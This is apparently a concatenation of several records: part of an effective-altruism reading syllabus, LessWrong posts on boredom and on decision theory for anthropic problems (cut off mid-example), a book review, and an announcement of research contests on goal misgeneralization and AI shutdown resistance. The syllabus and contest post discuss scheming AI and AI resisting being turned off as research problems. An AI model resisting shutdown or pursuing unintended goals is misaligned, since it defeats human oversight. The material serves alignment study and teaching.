* Clare, Stephen, and Goth, Aidan. 2020. “[How Good Is The Humane League Compared to the Against Malaria Foundation?](https://forum.effectivealtruism.org/posts/ahr8k42ZMTvTmTdwm/how-good-is-the-humane-league-compared-to-the-against)”
* Browning, Heather, and Veit, Walter. 2022. “[Longtermism and Animals](http://philsci-archive.pitt.edu/21572/).”
**4. Longtermism and Existential Risk Reduction**
=================================================
**Topic:**[[1]](#fn4l1w64znngi) Longtermism is, roughly, the idea that the long term future morally matters 1) in principle and 2) in practice. In particular, longtermism says that the best interventions we have available to us today are best *because*they have an impact in the far future.
In this session, we will discuss whether and if so why the long-term future matters, investigate whether this implies existential risk reduction is plausibly one of the highest impact cause areas, and consider whether other types of interventions remain competitive once we account for the long-term future.
**Literature:**
* Ord, Toby. 2020. *The Precipice.*Chapter 2: Existential Risks.
+ Prompt 1: In assessing the impacts of different interventions, ought we discount future well-being directly? (i.e. to treat well-being as less important *because* *and when* it occurs later in time)
+ Prompt 2: Why might we discount future well-being indirectly?
+ Prompt 3: What do you think is the most compelling case for taking existential risks to be of particular moral importance?
+ Prompt 4: Assuming that we should not discount future well-being directly, can interventions which deliver their impacts in the “near term” compete with existential risk reduction?
+ Prompt 5: Are there promising interventions that improve the long-term future but not through the channel of reducing extinction risks?
**Extra readings:**
* MacAskill, William. 2022. *What We Owe The Future*
* Tarsney, Christian. 2022. “[The Epistemic Challenge to Longtermism](https://globalprioritiesinstitute.org/wp-content/uploads/Tarsney-Epistemic-Challenge-to-Longtermism.pdf)”
* Greaves, Hilary. 2020. Talk: [“Evidence, cluelessness and the long term”](https://www.youtube.com/watch?v=fySZIYi2goY&ab_channel=CentreforEffectiveAltruism) (Watch from 7:41)
* Eden, Maya and Alexandrie, Gustav. 2023. [“Is Existential Risk Mitigation Uniquely Cost-Effective? Not in Standard Population Models”](https://globalprioritiesinstitute.org/gustav-alexandrie-and-maya-eden-is-existential-risk-mitigation-uniquely-cost-effective-not-in-standard-population-models/)
**5. AI risk**
==============
**Topic:** Because extinction threatens the existence of a potentially vast future, existential risk reduction might be the most important cause area—especially under longtermism. There are multiple important existential threats, such as pandemics and nuclear weapons. In this session, we focus on a (possibly less obvious) candidate for the most important existential risk: AI risk.
**Literature:**
* Piper, Kelsey. 2020. “[The case for taking AI seriously as a threat to humanity](https://www.vox.com/future-perfect/2018/12/21/18126576/ai-artificial-intelligence-machine-learning-safety-alignment)”
+ Prompt 1: Are you compelled by the case of how AI could wipe us out? What kind of evidence would push you towards one side or the other on this issue?
* Cotra, Ajeya. 2021. “[Why AI alignment could be hard with modern deep learning](https://www.cold-takes.com/why-ai-alignment-could-be-hard-with-modern-deep-learning/)”
+ Prompt 2: Which threat seems more likely: schemers or sycophants? Which seems more dangerous?
+ Prompt 3: Do you think the misalignment concerns with deep learning generalize to any kind of advanced AI?
* Ngo, Richard. 2020. “[AGI safety from first principles: Control](https://www.alignmentforum.org/s/mzgtmmTKKn5MuCzFJ/p/eGihD5jnD6LFzgDZA)”
+ Prompt 4: Are you compelled by the threat from an AGI that overpowers humanity? Is intelligence sufficient for a system to obtain such immense power?
+ Prompt 5: How might we prevent an AGI from obtaining dangerous levels of power?
**Extra readings:**
* Barak, Boaz and Edelman, Ben. 2022. ‘[AI will change the world, but won’t take it over by playing “3-dimensional chess](https://www.alignmentforum.org/posts/zB3ukZJqt3pQDw9jz/ai-will-change-the-world-but-won-t-take-it-over-by-playing-3)”’
+ On the issue of “returns of power to intelligence”
* Chritian, Brian. 2020. [*The Alignment Problem*](https://www.amazon.co.uk/Alignment-Problem-Machine-Learning-Values/dp/0393635821).
**6. Economics and AI risk**
============================
**Topic:** We consider how economists can contribute to mitigating risks from AI. We will focus on two main research areas within AI risk mitigation: AI governance and AI controllability.
**Literature:**
* Siegmann, Charlotte. 2023.["Economics and AI Risk: Background"](https://static1.squarespace.com/static/647796224461f039c379f070/t/64caecdb7dc72300a8953cc7/1691020507930/background.pdf)
+ Prompt 1: Do you think there's a possibility of TAI or explosive growth in the next decades/this century? How would you reduce uncertainty about this?
+ Prompt 2: Which reason do you find most compelling for taking the controllability challenge seriously?
+ Prompt 3: Which of the concerns raised in this article do you find most compelling?
* Siegmann, Charlotte. 2023.["Economics and AI Risk: Research Agenda and Overview"](https://static1.squarespace.com/static/647796224461f039c379f070/t/64caecc54f52f03aee4bb67a/1691020486983/research_agenda.pdf)
+ Prompt 4: Choose one of the three areas of AI governance research (i.e. development, deployment, forecasting) and discuss what you take to be the most promising ways to contribute to it.
+ Prompt 5: How can economists contribute to AI controllability and alignment research?
**Optional additional sessions**
================================
**Existential risk and economic growth**
----------------------------------------
**Goal and topic:** Increasing economic growth could be one way to positively affect the future. Whether this is the case depends in part on the relationship between growth and existential risk. We will explore some of the various ways in which existential risks and economic growth are related:
* Roughly, you can improve the long-term future by (1) making good trajectories better (e.g. via economic growth) or (2) avoiding bad trajectories such as extinction or suffering-filled scenarios.
* Whether economic growth mitigates or increases existential risks and what factors influence this relationship.
* Whether the lack of economic growth (stagnation) poses existential risk.
**Literature:**
* Greaves, Hilary. 2021. “[Longtermism and Economic Growth](https://www.youtube.com/watch?v=WctJDYUuWuc&ab_channel=StanfordExistentialRisksInitiative)” (video)
+ Prompt 1: Excluding the issue of existential risks, is economic growth good (from a longterm-sensitive perspective)? In what ways might it *not*be?
+ Prompt 2: Is faster or slower economic growth better? How does this depend on the nature of risks (state vs. transition) and the relationship between growth and risk?
* Aschenbrenner, Leopold. 2020. “[Securing Posterity](https://worksinprogress.co/issue/securing-posterity)”
+ Prompt 3: How could faster economic growth turn out to decrease overall risk? What could be missing from this picture?
* MacAskill, William. 2022. *What We Owe The Future* (Chapter 7: Stagnation)
+ Prompt 4: Do you think stagnation is an important problem on its own? What is the most contentious premise behind the case for stagnation as a hugely important problem? What is the strongest case?
**Extra readings:**
* Aschenbrenner, Leopold. 2020. “[Existential Risk and Growth](https://globalprioritiesinstitute.org/wp-content/uploads/Leopold-Aschenbrenner_Existential-risk-and-growth_.pdf)”
Other issues in this space:
* How advanced AI might affect economic growth
* Can we use economic growth models to predict the longterm future and AGI?
Relevant readings:
* Davidson, Tom. 2021. “[Report on Whether AI Could Drive Explosive Economic Growth](https://www.openphilanthropy.org/research/report-on-whether-ai-could-drive-explosive-economic-growth/)”
* Trammell, Philip and Korinek, Anton. 2020. “[Economic growth under transformative AI](https://globalprioritiesinstitute.org/wp-content/uploads/Philip-Trammell-and-Anton-Korinek_economic-growth-under-transformative-ai.pdf)”
**Patient philanthropy**
------------------------
**Topic:**The optimal timing of funding altruistic projects and how this depends on one’s level of 'patience' in relation to that of other funders.
**Literature:**
* Trammell, Philip. 2021. “[Patient Philanthropy in an Impatient World](https://docs.google.com/document/d/1NcfTgZsqT9k30ngeQbappYyn-UO4vltjkm64n4or5r4/edit)” (sections 1 to 3)
+ Prompt 1: In the current philanthropy landscape, is it important to consider the kinds of strategic interactions Trammel points to? Why?
+ Prompt 2: Sections 2.3 and 2.4 give reasons to believe that philanthropists can act more patiently than governments. Do you think that this is a good argument in support of philanthropic spending from a social standpoint?
+ Prompt 3: To what extent do the funding areas of interest to patient and impatient philanthropy overlap?
+ Prompt 4: Evaluate [Open Philanthropy's decision to spend its entire budget in 20 years](https://forum.effectivealtruism.org/posts/FHJMKSwrwdTogYLGF/we-re-no-longer-pausing-most-new-longtermist-funding).
**Population**
--------------
**Goal and topic:** The size of the global population influences the well-being of present and future generations in various ways. For instance, *prima facie* more people drive more greenhouse gas emissions, which drives worse climate change. But also, more people drive more innovation. And more people means more potential for human well-being. In this session, we will evaluate the ways in which population size relates to and affects long-term global well-being.
**Literature:**
* Greaves, Hilary. 2017. “[Population axiology](https://philpapers.org/archive/GREPA-6.pdf)”
+ Prompt 1: Which population axiology do you find most intuitive?
+ Prompt 2: Which view do you find most plausible upon reflection?
* Siegmann, Charlotte and Mota, Luis. 2022. “[Assessing the case for population growth as a priority](https://forum.effectivealtruism.org/posts/6uwAXinuaxyssofBB/assessing-the-case-for-population-growth-as-a-priority)”
+ Prompt 3: How would the implications of this writeup change when considering the consequences of population growth over the course of the next 2 centuries?
+ Prompt 4: Do you believe that larger populations lead to more benefits or harms on net?
+ Prompt 5: All things considered, is the case for intervening on population growth strong enough to make it one of the most important areas for further global priorities research?
**Alternate Longtermism Session**
=================================
*This session goes more in depth into the philosophical issues surrounding longtermism.*
**Longtermism, existential risk, and cluelessness**
===================================================
**Topic:** This session is about longtermism, roughly the idea that we should focus on interventions that deliver their benefits in the longterm future. We will discuss the case for longtermism and whether uncertainty about the future undermines or supports it.
**Literature:**
* MacAskill, William. 2022. *What We Owe The Future* (Chapter 1: The Case for Longtermism)
+ Prompt 1: Do you agree with the case for longtermism? Which of the premises do you find most contentious?
* Tarsney, Christian. 2022. “[The Epistemic Challenge to Longtermism](https://globalprioritiesinstitute.org/wp-content/uploads/Tarsney-Epistemic-Challenge-to-Longtermism.pdf)”
+ Prompt 2: What does Tarsney’s model reveal to you about the presuppositions required for longtermism? Are these presuppositions true?
+ Prompt 3: In light of the arguments of this article, to what extent do you think longtermism supports interventions other than existential risk reduction (e.g. economic growth)?
* Greaves, Hilary. 2020. Talk: [“Evidence, cluelessness and the long term”](https://www.youtube.com/watch?v=fySZIYi2goY&ab_channel=CentreforEffectiveAltruism) (Watch from 7:41)
+ Prompt 4: Which of the responses to the worry of cluelessness do you find most compelling?
+ Prompt 5: What is the case for how cluelessness might support (as opposed to undermine) longtermism?
**Extra readings:**
* Ord, Toby. 2020. *The Precipice.*Chapter 2: Existential Risks.
* Greaves, Hilary. 2016. [“Cluelessness”](https://philarchive.org/rec/GREC-38)
* Eden, Maya and Alexandrie, Gustav. 2023. [“Is Existential Risk Mitigation Uniquely Cost-Effective? Not in Standard Population Models”](https://globalprioritiesinstitute.org/gustav-alexandrie-and-maya-eden-is-existential-risk-mitigation-uniquely-cost-effective-not-in-standard-population-models/)
1. **[^](#fnref4l1w64znngi)**See the alternate session on longtermism for a more in depth discussion of the key philosophical issues. |
9da74c76-76db-4aa1-a5a0-87f3487500c5 | trentmkelly/LessWrong-43k | LessWrong | Against Against Boredom
I'm trying to clarify some feelings I had after reading the post Utopic Nightmares. Specifically, this bit:
> But in a future world where advancing technology’s returns on the human condition stop compensating for a state less than perfect hedonism, we can imagine editing boredom out of our lives
I would like to describe a toy moral theory that--while not exactly what I believe--gets at why I would consider "eliminating boredom" morally objectionable.
Experience maximizing hedonism
Consider an agent that perceives external reality through a set of sensors S0,S1,...Sn . It uses these sensors to build a model of external reality and estimate it's position in that reality at a point in time as a state Mt. It also has a number of actions At,i available to it at any given time.
The agent estimates the number of reachable future states V(t)=E(|{Mis.t∃pathMt−>..−>Mi|}) and "chooses" its actions so as to maximize the value of R(t) for some future time t. Obviously if the agent is dead, it cannot perceive or affect its future state, so it estimates V(dead)=1.
Internally the agent is running some kind of hill-climbing algorithm, so it experiences a reward after choosing an action Ai,t at time t of the form R(t)=V(t)−V(t−1). In this way, the agent experiences pleasure when it takes actions that increase V(t) and pain when it takes actions that decrease V(t) and over time the agent learns to take actions that maximize V(t).
Infinite Boredom
Now consider the infinite boredom of Utopic Nightmares. In this case the agent reaches a local maximum for V(t) and R(t) is now constant (and equal to zero). But of course there is no reason why R(t) need be zero when V(t) is constant. There's no reason why we couldn't have instead used R(t)c=V(t)−V(t−1)+c for our hill-climb. The agent would experience endless bliss (for positive values of c) or endless suffering (for negative values of c). Human experience suggests that our personal setting for c is in fact significantly |
16613997-ac5d-47a9-8c2b-f09cb0fb92fe | trentmkelly/LessWrong-43k | LessWrong | Uncontrollable: A Surprisingly Good Introduction to AI Risk
I recently read Darren McKee's book "Uncontrollable: The Threat of Artificial Superintelligence and the Race to Save the World".
I recommend this book as the best current introduction to AI risk for people with limited AI background.
It prompted me to update my thinking about Asimov's Laws and related risks in light of recent evidence about AI capabilities. I've written a longer review that explains my thoughts in more detail.
The author has a LW account here. |
4c9bb60d-019c-4412-9ce5-4e7f6aa6f181 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Announcing AI Alignment Awards: $100k research contests about goal misgeneralization & corrigibility
*We’re grateful to our advisors Nate Soares, John Wentworth, Richard Ngo, Lauro Langosco, and Amy Labenz. We're also grateful to Ajeya Cotra and Thomas Larsen for their feedback on the contests.*
**TLDR:** [**AI Alignment Awards**](https://alignmentawards.com) **is running two contests designed to raise awareness about AI alignment research and generate new research proposals. Prior experience with AI safety is not required. Promising submissions will win prizes up to $100,000** (though note that most prizes will be between $1k-$20k; we will only award higher prizes if we receive exceptional submissions.)
You can help us by sharing this post with people who are or might be interested in alignment research (e.g., student mailing lists, FB/Slack/Discord groups.)
What are the contests?
======================
We’re currently running two contests:
**Goal Misgeneralization Contest** (based on [Langosco et al., 2021](https://arxiv.org/abs/2105.14111)): AIs often learn unintended goals. Goal misgeneralization occurs when a reinforcement learning agent retains its capabilities out-of-distribution yet pursues the wrong goal. How can we prevent or detect goal misgeneralization?
**Shutdown Problem Contest** (based on [Soares et al., 2015](https://intelligence.org/files/Corrigibility.pdf)): Given that powerful AI systems might resist attempts to turn them off, how can we make sure they are open to being shut down?
What types of submissions are you interested in?
================================================
For the Goal Misgeneralization Contest, we’re interested in submissions that do at least one of the following:
1. Propose techniques for preventing or detecting goal misgeneralization
2. Propose ways for researchers to identify when goal misgeneralization is likely to occur
3. Identify new examples of goal misgeneralization in RL or non-RL domains. For example:
1. We might train an imitation learner to imitate a "non-consequentialist" agent, but it actually ends up learning a more consequentialist policy.
2. We might train an agent to be myopic (e.g., to only care about the next 10 steps), but it actually learns a policy that optimizes over a longer timeframe.
4. Suggest other ways to make progress on goal misgeneralization
For the Shutdown Problem Contest, we’re interested in submissions that do at least one of the following:
1. Propose ideas for solving the shutdown problem or designing corrigible AIs. These submissions should also include (a) explanations for how these ideas address core challenges raised in the corrigibility paper and (b) possible limitations and ways the idea might fail
2. Define The Shutdown Problem more rigorously or more empirically
3. Propose new ways of thinking about corrigibility (e.g., ways to understand corrigibility within a deep learning paradigm)
4. Strengthen [existing approaches](https://ai-alignment.com/training-robust-corrigibility-ce0e0a3b9b4d) to training corrigible agents (e.g., by making them more detailed, exploring new applications, or describing how they could be implemented)
5. Identify new challenges that will make it difficult to design corrigible agents
6. Suggest other ways to make progress on corrigibility
Why are you running these contests?
===================================
We think that corrigibility and goal misgeneralization are two of the most important problems that make AI alignment difficult. We expect that people who can reason well about these problems will be well-suited for alignment research, and we believe that progress on these subproblems would be meaningful advances for the field of AI alignment. We also think that many people could potentially contribute to these problems (we're only aware of a handful of serious attempts at engaging with these challenges). Moreover, we think that tackling these problems will offer a good way for people to "think like an alignment researcher."
We hope the contests will help us (a) find people who could become promising theoretical and empirical AI safety researchers, (b) raise awareness about corrigibility, goal misgeneralization, and other important problems relating to AI alignment, and (c) make actual progress on corrigibility and goal misgeneralization.
Who can participate?
====================
Anyone can participate.
What if I’ve never done AI alignment research before?
=====================================================
You can still participate. In fact, you’re our main target audience. One of the main purposes of AI Alignment Awards is to find people who *haven’t been doing alignment research* but *might be promising fits for alignment research*. If this describes you, consider participating. If this describes someone you know, consider sending this to them.
Note that we don’t expect newcomers to come up with a full solution to either problem (please feel free to prove us wrong, though). You should feel free to participate even if your proposal has limitations.
How can I help?
===============
You can help us by sharing this post with people who are or might be interested in alignment research (e.g., student mailing lists, FB/Slack/Discord groups) or specific individuals (e.g., your smart friend who is great at solving puzzles, learning about new topics, or writing about important research topics).
Feel free to use the following message:
**AI Alignment Awards is offering up to $100,000 to anyone who can make progress on problems in alignment research. Anyone can participate.** [**Learn more and apply at alignmentawards.com!**](https://www.alignmentawards.com/)
Will advanced AI be beneficial or catastrophic? We think this will depend on our ability to align advanced AI with desirable goals – something researchers don’t yet know how to do.
We’re running contests to make progress on two key subproblems in alignment:
* **The Goal Misgeneralization Contest** (based on [Langosco et al., 2021](https://arxiv.org/abs/2105.14111)): AIs often learn unintended goals. Goal misgeneralization occurs when a reinforcement learning agent retains its capabilities out-of-distribution yet pursues the wrong goal. How can we prevent or detect goal misgeneralization?
* **The Shutdown Contest** (based on [Soares et al., 2015](https://intelligence.org/files/Corrigibility.pdf)): Advanced AI systems might resist attempts to turn them off. How can we design AI systems that are open to being shut down, even as they get increasingly advanced?
No prerequisites are required to participate. **EDIT:** The deadline has been extended to May 1, 2023.
To learn more about AI alignment, see [alignmentawards.com/resources](https://www.alignmentawards.com/resources).
Outlook
=======
We see these contests as one possible step toward making progress on corrigibility, goal misgeneralization, and AI alignment. With that in mind, we’re unsure about how useful the contests will be. The prompts are very open-ended, and the problems are challenging. At best, the contests could raise awareness about AI alignment research, identify particularly promising researchers, and help us make progress on two of the most important topics in AI alignment research. At worst, they could be distracting, confusing, and difficult for people to engage with (note that we’re offering awards to people who can define the problems more concretely).
If you’re excited about the contest, we’d appreciate you sharing this post and the website ([alignmentawards.com](https://alignmentawards.com)) with people who might be interested in participating. We’d also encourage you to comment on this post if you have ideas you’d like to see tried. |
f0489993-6e10-4be9-aef9-0b5e608e7eaa | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | SUDT: A toy decision theory for updateless anthropics
The best approach I know for thinking about anthropic problems is Wei Dai's [Updateless Decision Theory](http://wiki.lesswrong.com/wiki/Updateless_decision_theory) (UDT). We aren't yet able to solve all problems that we'd like to—for example, when it comes to game theory, the only games we have any idea how to solve are very symmetric ones—but for many anthropic problems, UDT gives the obviously correct solution. However, UDT is somewhat underspecified, and [cousin\_it's concrete models of UDT](http://wiki.lesswrong.com/wiki/Ambient_decision_theory) based on formal logic are rather heavyweight if all you want is to figure out the solution to a simple anthropic problem.
In this post, I introduce a toy decision theory, *Simple Updateless Decision Theory* or SUDT, which is most definitely not a replacement for UDT but makes it easy to formally model and solve the kind of anthropic problems that we usually apply UDT to. (And, of course, it gives the same solutions as UDT.) I'll illustrate this with a few examples.
This post is a bit boring, because all it does is to take a bit of math that we already implicitly use all the time when we apply updateless reasoning to anthropic problems, and spells it out in excruciating detail. If you're already well-versed in that sort of thing, you're not going to learn much from this post. The reason I'm posting it anyway is that there are things I want to say about updateless anthropics, with a bit of simple math here and there, and while the math may be intuitive, the best thing I can point to in terms of details are the posts on UDT, which contain lots of irrelevant complications. So the main purpose of this post is to save people from having to reverse-engineer the simple math of SUDT from the more complex / less well-specified math of UDT.
(I'll also argue that Psy-Kosh's non-anthropic problem is a type of counterfactual mugging, I'll use the concept of [l-zombies](/lw/jkm/lzombies_lzombies/) to explain why UDT's response to this problem is correct, and I'll explain why this argument still works if there aren't any l-zombies.)
\*
I'll introduce SUDT by way of a first example: **the [counterfactual mugging](http://wiki.lesswrong.com/wiki/Counterfactual_mugging)**. In my preferred version, Omega appears to you and tells you that it has thrown a very biased coin, which had only a 1/1000 chance of landing heads; however, in this case, the coin has in fact fallen heads, which is why Omega is talking to you. It asks you to choose between two options, (H) and (T). If you choose (H), Omega will create a Friendly AI; if you choose (T), it will destroy the world. However, there is a catch: Before throwing the coin, Omega made a prediction about which of these options you would choose if the coin came up heads (and it was able to make a highly confident prediction). If the coin had come up tails, Omega would have destroyed the world if it's predicted that you'd choose (H), and it would have created a Friendly AI if it's predicted (T). (Incidentally, if it hadn't been able to make a confident prediction, it would just have destroyed the world outright.)
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| --- | --- | --- |
| You choose **(H)** if coin falls heads | Positive intelligence explosion | Humanity wiped out |
| You choose **(T)** if coin falls heads | Humanity wiped out | Positive intelligence explosion |
In this example, we are considering two possible worlds: $\text{heads}$ and $\text{tails}$. We write $\Omega$ (no pun intended) for the set of all possible worlds; thus, in this case, $\Omega = \{\text{heads}, \text{tails}\}$. We also have a probability distribution over $\Omega$, which we call $P$. In our example, $P(\text{heads}) = 1/1000$ and $P(\text{tails}) = 999/1000$.
In the counterfactual mugging, there is only one situation you might find yourself in in which you need to make a decision, namely when Omega tells you that the coin has fallen heads. In general, we write $I$ for the set of all possible situations in which you might need to make a decision; the $I$ stands for the *information* available to you, including both sensory input and your memories. In our case, we'll write $I = \{i_0\}$, where $i_0$ is the single situation where you need to make a decision.
For every $i \in I$, we write $A_i$ for the set of possible *actions* you can take if you find yourself in situation $i$. In our case, $A_{i_0} = \{(\mathrm{H}), (\mathrm{T})\}$. A *policy* (or "plan") is a function $\pi$ that associates to every situation $i \in I$ an action $\pi(i) \in A_i$ to take in this situation. We write $\Pi$ for the set of all policies. In our case, $\Pi = \{\pi_H, \pi_T\}$, where $\pi_H(i_0) = (\mathrm{H})$ and $\pi_T(i_0) = (\mathrm{T})$.
Next, there is a set of *outcomes*, $O$, which specify all the features of what happens in the world that make a difference to our final goals, and the *outcome function* $o : \Omega \times \Pi \to O$, which for every possible world $\omega$ and every policy $\pi$ specifies the outcome $o(\omega, \pi)$ that results from executing $\pi$ in the world $\omega$. In our case, $O = \{(+), (-)\}$ (standing for FAI and DOOM), and $o(\text{heads}, \pi_H) = o(\text{tails}, \pi_T) = (+)$ and $o(\text{heads}, \pi_T) = o(\text{tails}, \pi_H) = (-)$.
Finally, we have a *utility function* $U : O \to \mathbb{R}$. In our case, $U((+)) = 1$ and $U((-)) = 0$. (The exact numbers don't really matter, as long as $U((+)) > U((-))$, because utility functions don't change their meaning under affine transformations, i.e. when you add a constant to all utilities or multiply all utilities by a positive number.)
Thus, **an SUDT decision problem consists of the following ingredients:** The sets $\Omega$, $I$ and $O$ of possible worlds, situations you need to make a decision in, and outcomes; for every $i \in I$, the set $A_i$ of possible actions in that situation; the probability distribution $P$; and the outcome and utility functions $o$ and $U$. SUDT then says that you should choose a policy $\pi \in \Pi$ that maximizes the expected utility $\mathbb{E}[U(o(\omega^*, \pi))]$, where $\mathbb{E}$ is the expectation with respect to $P$, and $\omega^*$ is the true world.
In our case, $\mathbb{E}[U(o(\omega^*, \pi))]$ is just the probability of the good outcome $(+)$, according to the (prior) distribution $P$. For $\pi_H$, that probability is 1/1000; for $\pi_T$, it is 999/1000. Thus, SUDT (like UDT) recommends choosing (T).
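Since the recipe is mechanical (enumerate the policies, score each one by prior expected utility, take the argmax), it can be spelled out in a few lines of code. Here is a minimal Python sketch of that recipe applied to the counterfactual mugging; the function and variable names are mine, not standard notation:

```python
from itertools import product

def sudt_optimal_policies(worlds, prior, situations, actions, outcome, utility):
    """Brute-force SUDT: score every policy by its prior expected utility."""
    # A policy assigns one action to each situation (each decision point).
    policies = [dict(zip(situations, choice))
                for choice in product(*(actions[s] for s in situations))]
    def eu(policy):
        return sum(prior[w] * utility[outcome(w, policy)] for w in worlds)
    best = max(map(eu, policies))
    return [p for p in policies if eu(p) == best], best

# The counterfactual mugging: two worlds, one decision point.
worlds = ["heads", "tails"]
prior = {"heads": 1 / 1000, "tails": 999 / 1000}
situations = ["told heads"]
actions = {"told heads": ["H", "T"]}
utility = {"+": 1, "-": 0}

def outcome(world, policy):
    # FAI iff (heads and you choose H) or (tails and Omega predicted T).
    return "+" if (world == "heads") == (policy["told heads"] == "H") else "-"

print(sudt_optimal_policies(worlds, prior, situations, actions, outcome, utility))
# ([{'told heads': 'T'}], 0.999)
```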
If you set up the problem in SUDT like that, it's kind of hidden why you could possibly think that's *not* the right thing to do, since we aren't distinguishing situations $i \in I$ that are "actually experienced" in a particular possible world $\omega$; there's nothing in the formalism that reflects the fact that Omega never asks us for our choice if the coin comes up tails. In [my post on l-zombies](/lw/jkm/lzombies_lzombies/), I've argued that this makes sense because even if there's no version of you that actually consciously experiences being in the heads world, this version still exists as a Turing machine and the choices that it makes influence what happens in the real world. If all mathematically possible experiences exist, so that there *aren't* any l-zombies, but some experiences are "experienced more" (have more "magical reality fluid") than others, the argument is even clearer—even if there's some anthropic sense in which, upon being told that the coin fell heads, you can conclude that you should assign a high probability of being in the heads world, *the same version of you still exists in the tails world*, and its choices influence what happens there. And if everything is experienced to the same degree (no magical reality fluid), the argument is clearer still.
\*
From Vladimir Nesov's counterfactual mugging, let's move on to what I'd like to call **Psy-Kosh's probably counterfactual mugging**, better known as [**Psy-Kosh's non-anthropic problem**](/lw/3dy/solve_psykoshs_nonanthropic_problem/). This time, you're not alone: Omega gathers you together with 999,999 other advanced rationalists, all well-versed in anthropic reasoning and SUDT. It places each of you in a separate room. Then, as before, it throws a very biased coin, which has only a 1/1000 chance of landing heads. If the coin *does* land heads, then Omega asks all of you to choose between two options, (H) and (T). If the coin falls *tails*, on the other hand, Omega chooses one of you at random and asks that person to choose between (H) and (T). If the coin lands heads and you all choose (H), Omega will create a Friendly AI; same if the coin lands tails, and the person who's asked chooses (T); else, Omega will destroy the world.
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| --- | --- | --- |
| Everyone chooses **(H)** if asked | Positive intelligence explosion | Humanity wiped out |
| Everyone chooses **(T)** if asked | Humanity wiped out | Positive intelligence explosion |
| Different people choose differently | Humanity wiped out | (Depends on who is asked) |
We'll assume that all of you prefer a positive FOOM over a gloomy DOOM, which means that all of you have the same values as far as the outcomes of this little dilemma are concerned: , as before, and all of you have the same utility function, given by  and . As long as that's the case, we can apply SUDT to find a sensible policy for everybody to follow (though when there is more than one optimal policy, and the different people involved can't talk to each other, it may not be clear how one of the policies should be chosen).
This time, we have a million different people, who can in principle each make an independent decision about what to answer if Omega asks them the question. Thus, we have . Each of these people can choose between (H) and (T), so  for every person , and a policy  is a function that returns either (H) or (T) for every . Obviously, we're particularly interested in the policies  and  satisfying  and  for all .
The possible worlds are ,\dotsc,(%5Ctext%7Btails%7D,10^6)%5C%7D), and their probabilities are  and %29%20=%20%5Cfrac%7B999%7D%7B1000%7D%5Ccdot10^%7B-6%7D). The outcome function is as follows: ,  for , ,\pi)=(%2B)) if =(\mathrm{T})), and  otherwise.
What does SUDT recommend? As in the counterfactual mugging,  is the probability of the good outcome , under policy . For , the good outcome can only happen if the coin falls heads: in other words, with probability . If , then the good outcome can *not* happen if the coin falls heads, because in that case everybody gets asked, and at least one person chooses (T). Thus, in this case, the good outcome will happen only if the coin comes up tails and the randomly chosen person answers (T); this probability is , where  is the number of people answering (T). Clearly, this is maximized for , where ; moreover, in this case we get the probability , which is better than for , so SUDT recommends the plan .
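The same brute-force sketch from the counterfactual mugging above can check this directly on a scaled-down version of the problem (a hypothetical 4-person variant, since enumerating all $2^{10^6}$ policies of the full version is hopeless):

```python
# Scaled-down Psy-Kosh problem: n = 4 people instead of 10^6, purely so the
# policy space stays enumerable; reuses sudt_optimal_policies and utility.
n = 4
worlds = ["heads"] + [("tails", i) for i in range(n)]
prior = {"heads": 1 / 1000, **{("tails", i): (999 / 1000) / n for i in range(n)}}
situations = list(range(n))              # situation i: person i is asked
actions = {i: ["H", "T"] for i in range(n)}

def outcome(world, policy):
    if world == "heads":                 # everyone is asked; all must say H
        return "+" if all(policy[i] == "H" for i in range(n)) else "-"
    _, chosen = world                    # tails: one random person is asked
    return "+" if policy[chosen] == "T" else "-"

print(sudt_optimal_policies(worlds, prior, situations, actions, outcome, utility))
# ([{0: 'T', 1: 'T', 2: 'T', 3: 'T'}], ~0.999): everyone answering (T) wins.
```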
Again, when you set up the problem in SUDT, it's not even obvious why anyone might think this *wasn't* the correct answer. The reason is that if Omega asks you, and you update on the fact that you've been asked, then after updating, you are quite certain that the coin has landed *heads*: yes, your prior probability was only 1/1000, but if the coin has landed tails, the chances that *you* would be asked was only one in a million, so the posterior odds are about 1000:1 in favor of heads. So, you might reason, it would be best if everybody chose (H); and moreover, all the people in the other rooms will reason the same way as you, so if you choose (H), they will as well, and this maximizes the probability that humanity survives. This relies on the fact that the others will choose the same way as you, but since you're all good rationalists using the same decision theory, that's going to be the case.
But in the worlds where the coin comes up tails, and Omega chooses someone else than you, the version of you that gets asked for its decision still "exists"... as an l-zombie. You might think that what this version of you does or doesn't do doesn't influence what happens in the real world; but if we accept the argument from the previous paragraph that your decisions are "linked" to those of the other people in the experiment, then they're *still* linked if the version of you making the decision is an l-zombie: If we see you as a Turing machine making a decision, that Turing machine should reason, "If the coin came up tails and someone else was chosen, then I'm an l-zombie, but the person who is actually chosen will reason exactly the same way I'm doing now, and will come to the same decision; hence, my decision influences what happens in the real world even in this case, and I can't do an update and just ignore those possible worlds."
I call this the "probably counterfactual mugging" because in the counterfactual mugging, you are making your choice because of its benefits in a possible world that is *ruled out* by your observations, while in the probably counterfactual mugging, you're making it because of its benefits in a set of possible worlds that is made *very improbable* by your observations (because *most* of the worlds in this set are ruled out). As with the counterfactual mugging, this argument is just all the stronger if there are no l-zombies because all mathematically possible experiences are in fact experienced.
\*
As a final example, let's look at what I'd like to call [**Eliezer's anthropic mugging**](/lw/17c/outlawing_anthropics_an_updateless_dilemma/): the anthropic problem that inspired Psy-Kosh's non-anthropic one. This time, you're alone again, except that there's many of you: Omega is creating a million copies of you. It flips its usual very biased coin, and if that coin falls heads, it places all of you in exactly identical green rooms. If the coin falls tails, it places *one* of you in a green room, and all the others in red rooms. It then asks all copies in green rooms to choose between (H) and (T); if your choice agrees with the coin, FOOM, else DOOM.
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| --- | --- | --- |
| Green roomers choose **(H)** | Positive intelligence explosion | Humanity wiped out |
| Green roomers choose **(T)** | Humanity wiped out | Positive intelligence explosion |
